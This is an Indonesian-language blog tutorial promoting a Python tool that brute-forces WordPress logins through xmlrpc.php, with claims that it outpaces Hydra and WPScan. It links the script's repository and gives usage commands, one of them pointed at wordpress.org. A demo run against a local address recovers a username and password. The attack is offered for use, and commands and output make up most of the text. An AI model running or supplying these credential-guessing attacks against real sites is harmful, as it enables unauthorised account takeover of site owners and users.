XMLRPC Brutforce Tools yang menargetkan WordPress yang ditulis dengan Python 3. Dalam konteks xmlrpc brute forcing, tools ini lebih cepat daripada Hydra dan WpScan. Bahkan up to 1000 kata sandi per detik.
Ok kali ini saya akan membahas mengenai web security kembali yang berfokus ke salah satu CMS paling populer saat ini yaitu WordPress.
Salah satu metode penyerangan yang sangat populer pada CMS yang sangat populer ini salah staunya adalah Bruteforce Attack.
Bruteforce sendiri adalah metode untuk meretas password (password cracking) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Metode ini tidak dijamin akan berhasil menemukan password yang ingin diretas.
Yuk langsung ke tutorial :
Download scriptnya disini : https://github.com/kavishgr/xmlrpc-bruteforcer
Cara menggunakanya :
python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt
Kalau muncul pesan seperti ini “xml.etree.ElementTree.ParseError:” hapus www atau https.
Demo :
tegal1337 $ kavish$ python3 xmlrpcbruteforce.py http://192.168.100.34/xmlrpc.php 10k-most-common.txt elliot
---------------Examining Target--------------------
[>] Target is vulnerable.
--=[Target: http://192.168.100.34/xmlrpc.php]=--
[...Bruteforcing...]--=[Tried: 1000 passwords]=--
--=[Tried: 2000 passwords]=--
--=[Tried: 3000 passwords]=--
--------------- BRUTEFORCE SUCCESSFULL ---------------
--=[User found]=--
Login: elliot
Password: ER28-0652
--=[Exiting...]=--